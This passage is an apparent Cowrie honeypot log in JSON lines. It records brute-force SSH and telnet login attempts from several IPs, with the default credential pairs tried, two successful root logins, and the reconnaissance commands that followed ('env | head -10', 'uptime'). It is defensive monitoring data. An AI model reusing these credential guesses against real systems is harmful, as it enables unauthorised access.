03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:28:52.538693Z","src_ip":"212.227.235.229","session":"e948997c0225"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:28:53.786820Z","src_ip":"212.227.235.229","session":"e948997c0225"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:28:55.091202Z","src_ip":"212.227.235.229","session":"e948997c0225"}
{"eventid":"cowrie.session.closed","duration":12.780102252960205,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:01.838030Z","src_ip":"212.227.235.229","session":"47bc961788d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3106,"dst_ip":"1.2.3.4","dst_port":23,"session":"1908fcbf1dea","protocol":"telnet","message":"New connection: 212.227.235.229:3106 (1.2.3.4:23) [session: 1908fcbf1dea]","sensor":"my-vps","timestamp":"2025-08-31T00:29:02.000221Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41552,"dst_ip":"1.2.3.4","dst_port":22,"session":"08b058e27ec0","protocol":"ssh","message":"New connection: 212.227.125.160:41552 (1.2.3.4:22) [session: 08b058e27ec0]","sensor":"my-vps","timestamp":"2025-08-31T00:29:02.333193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:29:02.784117Z","src_ip":"212.227.125.160","session":"08b058e27ec0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:29:02.784791Z","src_ip":"212.227.125.160","session":"08b058e27ec0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345","message":"login attempt [backup/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:29:04.621803Z","src_ip":"212.227.125.160","session":"08b058e27ec0"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:06.218319Z","src_ip":"212.227.125.160","session":"08b058e27ec0"}
{"eventid":"cowrie.session.closed","duration":12.827506065368652,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:14.827624Z","src_ip":"212.227.235.229","session":"1908fcbf1dea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1872,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b78581ad36c","protocol":"telnet","message":"New connection: 212.227.235.229:1872 (1.2.3.4:23) [session: 4b78581ad36c]","sensor":"my-vps","timestamp":"2025-08-31T00:29:14.988067Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38820,"dst_ip":"1.2.3.4","dst_port":22,"session":"e319e8f1a843","protocol":"ssh","message":"New connection: 212.227.125.160:38820 (1.2.3.4:22) [session: e319e8f1a843]","sensor":"my-vps","timestamp":"2025-08-31T00:29:26.346157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:29:27.523306Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:29:27.524029Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.session.closed","duration":12.80131220817566,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:27.789311Z","src_ip":"212.227.235.229","session":"4b78581ad36c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1879,"dst_ip":"1.2.3.4","dst_port":23,"session":"85a8a0836780","protocol":"telnet","message":"New connection: 212.227.235.229:1879 (1.2.3.4:23) [session: 85a8a0836780]","sensor":"my-vps","timestamp":"2025-08-31T00:29:27.951739Z"}
{"eventid":"cowrie.login.success","username":"root","password":"better102030","message":"login attempt [root/better102030] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:29:33.581566Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:29:36.226823Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T00:29:36.227594Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:37.617176Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:37.644648Z","src_ip":"212.227.125.160","session":"e319e8f1a843"}
{"eventid":"cowrie.session.closed","duration":12.88637113571167,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:40.838040Z","src_ip":"212.227.235.229","session":"85a8a0836780"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3146,"dst_ip":"1.2.3.4","dst_port":23,"session":"211434f6d76c","protocol":"telnet","message":"New connection: 212.227.235.229:3146 (1.2.3.4:23) [session: 211434f6d76c]","sensor":"my-vps","timestamp":"2025-08-31T00:29:41.001296Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49196,"dst_ip":"1.2.3.4","dst_port":22,"session":"876494256206","protocol":"ssh","message":"New connection: 212.227.125.160:49196 (1.2.3.4:22) [session: 876494256206]","sensor":"my-vps","timestamp":"2025-08-31T00:29:43.623410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:29:43.624305Z","src_ip":"212.227.125.160","session":"876494256206"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:29:43.843078Z","src_ip":"212.227.125.160","session":"876494256206"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":46472,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed775144fc08","protocol":"ssh","message":"New connection: 201.148.180.50:46472 (1.2.3.4:22) [session: ed775144fc08]","sensor":"my-vps","timestamp":"2025-08-31T00:29:45.940924Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34340,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a5bc1a546fd","protocol":"ssh","message":"New connection: 212.227.235.229:34340 (1.2.3.4:22) [session: 1a5bc1a546fd]","sensor":"my-vps","timestamp":"2025-08-31T00:29:46.957114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:29:47.085047Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:29:47.115792Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:29:48.995926Z","src_ip":"212.227.235.229","session":"1a5bc1a546fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:29:48.996627Z","src_ip":"212.227.235.229","session":"1a5bc1a546fd"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:51.623823Z","src_ip":"212.227.125.160","session":"876494256206"}
{"eventid":"cowrie.login.success","username":"root","password":"better102030","message":"login attempt [root/better102030] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:29:52.977200Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.session.closed","duration":12.586414337158203,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:53.587637Z","src_ip":"212.227.235.229","session":"211434f6d76c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41210,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdde36c77018","protocol":"ssh","message":"New connection: 212.227.235.229:41210 (1.2.3.4:22) [session: bdde36c77018]","sensor":"my-vps","timestamp":"2025-08-31T00:29:53.868215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:29:53.868900Z","src_ip":"212.227.235.229","session":"bdde36c77018"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234567","message":"login attempt [backup/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:29:53.993346Z","src_ip":"212.227.235.229","session":"1a5bc1a546fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:29:54.167449Z","src_ip":"212.227.235.229","session":"bdde36c77018"}
{"eventid":"cowrie.login.failed","username":"vyatta","password":"vyatta123","message":"login attempt [vyatta/vyatta123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:29:55.409977Z","src_ip":"212.227.235.229","session":"bdde36c77018"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:55.840106Z","src_ip":"212.227.235.229","session":"1a5bc1a546fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:29:56.362272Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T00:29:56.363050Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:56.710365Z","src_ip":"212.227.235.229","session":"bdde36c77018"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:59.117851Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:29:59.137697Z","src_ip":"201.148.180.50","session":"ed775144fc08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53632,"dst_ip":"1.2.3.4","dst_port":22,"session":"aada22363f9e","protocol":"ssh","message":"New connection: 212.227.125.160:53632 (1.2.3.4:22) [session: aada22363f9e]","sensor":"my-vps","timestamp":"2025-08-31T00:30:10.480170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:30:10.938722Z","src_ip":"212.227.125.160","session":"aada22363f9e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:30:10.939459Z","src_ip":"212.227.125.160","session":"aada22363f9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29093,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a44106d970","protocol":"ssh","message":"New connection: 212.227.235.229:29093 (1.2.3.4:22) [session: 26a44106d970]","sensor":"my-vps","timestamp":"2025-08-31T00:30:13.005208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:30:13.006128Z","src_ip":"212.227.235.229","session":"26a44106d970"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:30:13.132030Z","src_ip":"212.227.235.229","session":"26a44106d970"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234567","message":"login attempt [backup/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T00:30:13.239080Z","src_ip":"212.227.125.160","session":"aada22363f9e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T00:30:13.716118Z","src_ip":"212.227.235.229","session":"26a44106d970"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:30:14.849703Z","src_ip":"212.227.235.229","session":"26a44106d970"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:30:15.048219Z","src_ip":"212.227.125.160","session":"aada22363f9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47240,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b25932a4fc0","protocol":"ssh","message":"New connection: 212.227.235.229:47240 (1.2.3.4:22) [session: 3b25932a4fc0]","sensor":"my-vps","timestamp":"2025-08-31T00:30:53.931717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:30:54.759310Z","src_ip":"212.227.235.229","session":"3b25932a4fc0"}
